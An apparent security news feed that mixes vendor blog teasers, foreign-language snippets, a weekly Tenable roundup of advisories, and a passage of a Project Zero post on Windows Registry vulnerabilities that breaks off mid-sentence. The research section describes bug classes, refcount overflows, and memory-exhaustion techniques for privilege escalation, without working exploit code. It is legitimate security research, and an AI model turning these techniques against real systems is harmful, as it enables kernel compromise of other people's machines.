As a security professional, you’ve probably fielded your fair share of frustrated questions from friends and family: “My data was in that breach — can I sue?” The short answer? Probably not. Even as data breaches grow in frequency and impact, the chances of individual consumers successfully suing breached companies remain vanishingly small. That’s not… The post Why Consumers Rarely Win Lawsuits After a Data Breach — and What It Means for Your Security Strategy appeared first on Portnox.

We’re thrilled to share that Skyhigh Security has been recognized in the 2025 Gartner® Magic Quadrant™ for Security Service Edge... The post Skyhigh Security Named In The 2025 Magic Quadrant For Security Service Edge appeared first on Skyhigh Security.

As Memorial Day Weekend approaches, many organizations prepare for a well-deserved break. But while employees take time off, cybercriminals get to work.

Palo Alto Networks has been named a Leader in the 2025 Gartner Magic Quadrant for Security Service Edge, for the third time. The post A 3X Leader in Gartner 2025 Magic Quadrant for SSE appeared first on Palo Alto Networks Blog.

Learn how deception for zero day attacks helps detect and divert hidden threats before they cause damage. Boost your active defense strategy today. The post Effective Deception for Zero Day Attacks: Strategies for Cyber Defense appeared first on Fidelis Security.

The incident at Kettering Health disrupted procedures for patients

If you’re an independent security researcher, blogger, or part of a security team conducting initial investigations, Silent Push Community Edition is a free threat hunting tool that gives you the ability to locate and traverse malicious infrastructure across the public internet (“clear web”) and dark web simultaneously, and uncover hidden domains and IPs for further investigation.  […] The post Scanning the public web and dark web for ransomware infrastructure in Silent Push Community Edition  appeared first on Silent Push.

If you’re an independent security researcher, blogger, or part of a security team conducting initial investigations, Silent Push Community Edition is a free threat hunting tool that gives you the ability to locate and traverse malicious infrastructure across the public internet (“clear web”) and dark web simultaneously, and uncover hidden domains and IPs for further investigation.  […] The post Scanning the public web and dark web for ransomware infrastructure in Silent Push Community Edition  appeared first on Silent Push.

Silent Ransom Group Targeting Law Firms

I veckans nyhetssvep rapporteras det om flera internationella insatser för att störa cyberkriminell aktivitet. Utöver detta, en hel drös läsvärda rapporter om allt från analyser av utpressningsangrepp till hur man bör agera när det är dags att ta digitala tillgångar av olika slag ur drift.

Publication of SAP SE, Walldorf, pursuant to Sec. 62 para. 3 sent. 2 half sent. 1 UmwG

Law enforcement seizes Lumma infrastructure, threat actor exploits cloud subdomains to spread malware, and Russia's GRU targets Ukraine aid efforts.

We are proud to honor and pay tribute to fallen veterans. The post Celebrating and Honoring Memorial Day appeared first on Commvault - English - United States.

Check out expert recommendations for protecting your AI system data. Plus, boost your IT department’s cybersecurity skills with a new interactive framework. In addition, learn about a malware campaign targeting critical infrastructure orgs. And get the latest on Russian cyber espionage and on a NIST effort to enhance vulnerability prioritization.Dive into five things that are top of mind for the week ending May 23.1 - Cyber agencies offer AI data security best practicesWith organizations gleefully deploying artificial intelligence (AI) tools to enhance their operations, cybersecurity teams face the critical task of securing AI data.If your organization is looking for guidance on how to protect the data used in AI systems, check out new best practices released this week by cyber agencies from Australia, New Zealand, the U.K. and the U.S.“This guidance is intended primarily for organizations using AI systems in their operations, with a focus on protecting sensitive, proprietary or mission-critical data,” reads the document titled “AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems.”“The principles outlined in this information sheet provide a robust foundation for securing AI data and ensuring the reliability and accuracy of AI-driven outcomes,” it adds. By drafting this guidance, the authoring agencies seek to accomplish three goals:Create awareness about data security risks involved in developing, testing and deploying AI systems.Offer best practices for securing data throughout the AI lifecycle.Promote the adoption of strong data-security techniques and of risk-mitigation strategies.Here’s a small sampling of recommended best practices in the 22-page document:Use trusted, reliable data source for training your AI models and adopt provenance-tracking to trace the training-data origins.Employ checksums and cryptographic hashes to maintain the AI data’s integrity during storage and transmission.Adopt digital signatures to prevent unauthorized third-parties from tampering with the AI data.For more information about AI data security, check out these Tenable resources:“Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources” (blog)“Tenable Cloud AI Risk Report 2025” (report)“Who's Afraid of AI Risk in Cloud Environments?” (blog)“Tenable Cloud AI Risk Report 2025: Helping You Build More Secure AI Models in the Cloud” (on-demand webinar)“Securing the AI Attack Surface: Separating the Unknown from the Well Understood” (blog)2 - Framework maps cyber skills across 14 IT rolesSecurity skills must extend beyond an organization’s cyber team and across your IT department – but how?It’s a question that the Linux Foundation and the Open Source Security Foundation have tried to answer with a new reference framework that maps required cyber skills across 14 IT department roles.The new “Cybersecurity Skills Framework,” available via an interactive web interface, is meant to be a “starting point” for organizations to then adjust the framework’s guidance based on their specific needs and requirements.“The framework provides leaders with an easy way to understand the cybersecurity skills needed, quickly identify knowledge gaps, and incorporate critical skills into all of their IT roles,” the Linux Foundation and OpenSSF said in a statement. “By establishing a shared language for cybersecurity readiness, the framework prepares everyone who touches a system to take responsibility for security, not just the cybersecurity specialists,” the organizations added.The required cyber skills are organized into three categories for each IT role: basic, intermediate and advanced. For example, for a web developer the framework lists nine basic cybersecurity skills, seven intermediate ones and five advanced ones. Cybersecurity skills for a web developer include:Basic: Adopt input validation and injection prevention techniques to prevent vulnerabilities like cross-site scripting and SQL injection.Intermediate: Implementing scanning and testing throughout the development lifecycle.Advanced: Deepen advanced cryptographic techniques such as digital signatures and hashing algorithms.For more information about cybersecurity skills enterprises need today:“5 Essential Cybersecurity Skills Every IT Professional Should Master” (Ascend Education)“5 Cybersecurity Skills Every IT Professional Should Master” (WebAsha Technologies)“The Most In-Demand Cybersecurity Skills” (Dice)“10 must-have cybersecurity skills for career success in 2025” (TechTarget)“Why Cybersecurity Skills Are Essential for Entry-Level Tech Roles in 2025” (EC-Council)3 - Alert: LummaC2 malware used against critical infrastructureCyber attackers are deploying the LummaC2 malware in an attempt to breach the networks of U.S. critical infrastructure organizations and steal sensitive data.The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued the warning this week in a joint advisory that outlines attackers’ TTPs and indicators of compromise, along with recommended mitigations.“LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors,” the advisory reads. Cyber attackers use spearphishing methods to trick victims into downloading legit-looking apps that contain the LummaC2 malware, which has been available in cybercriminal forums since 2022. The malware’s obfuscation methods allow it to bypass standard cyber controls.“Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection,” the advisory reads.Mitigation recommendations include:Monitor and detect anomalous behavior, such as API calls that try to retrieve system information.Implement application controls, such as allowlisting remote access programs.Adopt phishing-resistant multi-factor authentication.Collect logs to regularly review registry changes and access logs that may signal a LummaC2 malware infection.Regularly update and patch software to remediate critical vulnerabilities.For more information about OT systems cybersecurity, check out these Tenable resources: “What is operational technology (OT)?” (guide)“Discover, Measure, and Minimize the Risk Posed by Your Interconnected IT/OT/IoT Environments” (on-demand webinar)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)“OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)4 - Logistics and tech vendors warned about Russian cyber spiesCyber attackers backed by Russia’s GRU military intelligence unit have unleashed an aggressive cyber espionage campaign targeting U.S. and European technology companies and logistics providers involved in delivering aid to Ukraine.That’s according to the joint advisory “Russian GRU Targeting Western Logistics Entities and Technology Companies” published this week by cybersecurity and law enforcement agencies from 11 countries, including Australia, Canada, France, Germany, the U.K. and the U.S.“This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide-scale targeting of IP cameras in Ukraine and bordering NATO nations,” the 33-page document reads. The group carrying out the cyber espionage campaign, known by various names, including APT28 and Fancy Bear, uses multiple tactics, techniques and procedures (TTPs) to gain initial access to victims’ networks, including: brute-force password attackscredential spearphishingmalware deliveryvulnerability exploitationattacks against VPNsThe advisory’s mitigation recommendations include:Segment networks, restrict network access and adopt a zero-trust architectureAutomatically log network access and audit the logs to identify suspicious access requestsImplement allowlisting for applications and scriptsAdopt tools that check the safety of links in emailsUse multi-factor authentication with passkeys or PKI smartcardsLimit the number of administrative accounts Change all default credentialsFor more information about APT28 / Fancy Bear:“APT28” (MITRE ATT&CK)“Fancy Bear 'Nearest Neighbor' Attack Uses Nearby Wi-Fi Network” (Dark Reading)"Fancy Bear (APT28)" (Bugcrowd)"Fancy Bear Goes Phishing: The Dark History of the Information Age, in Five Extraordinary Hacks" (Publishers Weekly)"APT28" (Malpedia)5 - NIST develops metric to predict likelihood of a vulnerability’s exploitationKnowing which vulnerabilities have been exploited in the wild is priceless information for a security team as it prioritizes which ones to patch first.Now, the U.S. National Institute of Standards and Technology has come up with a set of calculations designed to determine a vulnerability’s exploitation chances.“Only a small fraction of the tens of thousands of software and hardware vulnerabilities that are published every year will be exploited. Predicting which ones is important for the efficiency and cost effectiveness of enterprise vulnerability remediation efforts,” reads NIST’s white paper “Likely Exploited Vulnerabilities: A Proposed Metric for Vulnerability Exploitation Probability,” published this week. NIST calls the metric LEV, which stands for “likely exploited vulnerabilities.” LEV, NIST says, may help augment both the Known Exploited Vulnerabilities Catalog (KEV) database and the Exploit Prediction Scoring System (EPSS) by adding entries to the former and enhancing the latter’s accuracy.The LEV equation, which has been implemented using Python and uses data from the National Vulnerability Database (NVD), KEV and EPSS, is “mathematically sound” but its error margin is unknown, so it needs to be rigorously tested, according to NIST.For more information about NIST’s LEV:“NIST's 'LEV' Equation to Determine Likelihood a Bug Was Exploited” (Dark Reading)“NIST Proposes Security Metric to Determine Likely Exploited Vulnerabilities” (Cybersecurity News)“Vulnerability Exploitation Probability Metric Proposed by NIST, CISA Researchers” (SecurityWeek)

Mobile Security Framework (MobSF) is a widely used open-source tool designed to help you perform static and dynamic analysis of Android, iOS, and Windows mobile apps. It’s a popular choice among developers and security teams for identifying vulnerabilities early in the development process.

SANTA CLARA, Calif. , May 23, 2025 /PRNewswire/ -- Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, announced today that members of its management team will be presenting at the following financial community event: Bank of America 2025 Global Technology Conference Tuesday, June

SAP is empowering organizations to navigate the complexities of the current landscape and emerge stronger, more adaptable, and better equipped to face the future.

The SAP Global Partner Summit explored how SAP Business Suite will redefine business with a unique Suite-as-a-Service offering.

SAP is transforming how organizations turn sustainability commitments into competitive advantage.

Zero-day threats are among the biggest risks in cybersecurity. They occur when a vulnerability—in this case meaning a security flaw or weak point in software or hardware that is unknown to the vendor or developers—is exploited to gain access. They are named as such because the vendor or developer has zero days to fix...

Discover why traditional security fails to stop attackers inside your network and how Fidelis Deception accelerates breach detection by exposing threats earlier protecting your critical assets with proactive defense. The post How Fidelis Deception Turns Your Attack Surface into a Defensive Advantage appeared first on Fidelis Security.

ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure

Eile õhtul lõppes mobiiltelefonidele loodud e-hääletamise rakenduse prototüübi avalik testimine. Kokku osales testhääletusel 2430* inimest 29 eri riigist ning tulemuste põhjal kogus enim toetust Balti kett (1989) 439 häälega, sellele järgnesid Kaali meteoriidi langemine (u 1500 eKR) 423 häälega ja Eesti Vabariigi väljakuulutamine (1918) 420 häälega.

Memory safety vulnerabilities are one of the most prevalent weaknesses in software, and the number of Known Exploited Vulnerabilities (KEVs) across industries are steadily increasing. In a webinar hosted by Dark Reading, RunSafe Security CTO Shane Fry and VulnCheck Security Researcher Patrick Garrity discussed the rise of memory safety vulnerabilities listed in the KEV catalog […] The post Memory Safety KEVs Are Increasing Across Industries appeared first on RunSafe Security.

Cross-site Scripting (XSS) vulnerability (CVE-2025-4379) has been found in Studio Fabryka DobryCMS software.

Talos analyzed six months of PowerShell network telemetry and found that rare domains are over three times more likely to be malicious compared to frequently contacted ones.

CVE-2025-31324 impacts SAP NetWeaver's Visual Composer Framework. We share our observations on this vulnerability using incident response cases and telemetry. The post Threat Brief: CVE-2025-31324 (Updated May 23) appeared first on Unit 42.

A host of ransomware strains have been neutralized, servers seized, and key players indicted

In this post, I’ll look at CVE-2025-0072, a vulnerability in the Arm Mali GPU, and show how it can be exploited to gain kernel code execution even when Memory Tagging Extension (MTE) is enabled. The post Bypassing MTE with CVE-2025-0072 appeared first on The GitHub Blog.

In this post, I’ll look at CVE-2025-0072, a vulnerability in the Arm Mali GPU, and show how it can be exploited to gain kernel code execution even when Memory Tagging Extension (MTE) is enabled. The post Bypassing MTE with CVE-2025-0072 appeared first on The GitHub Blog.

M&S disclose hackers gained entry via a third-party, amid series of attacks on major UK retailer

Cybercriminals are getting smarter. Not by developing new types of malware or exploiting zero-day vulnerabilities, but by simply pretending to be helpful IT support desk workers. Find out how they do it in my article on the Tripwire State of Security blog.

Posted by Mateusz Jurczyk, Google Project Zero In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future. In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking. Let's start with a quick recap of the registry's most fundamental properties as an attack surface: Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.Security properties The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows.  Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.Broad range of bug classes Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below: Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.Information disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface. If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this: Manual reference counting As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs: Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.Aggressive self-healing and recovery As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure. However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139. Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle. Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.Unclear boundaries between hard and conventional format requirements This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code. We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below: Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list. These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not unenforced by the loader: CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability. As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.Susceptibility to mishandling OOM conditions Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme: NTSTATUS NtHighLevelOperation(...) {   NTSTATUS Status;   Status = HelperFunction1(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }   Status = HelperFunction2(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }     //   // More calls...   //   return STATUS_SUCCESS; } Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them. A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not. Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability. Considering all this, it is a fair assumption that a 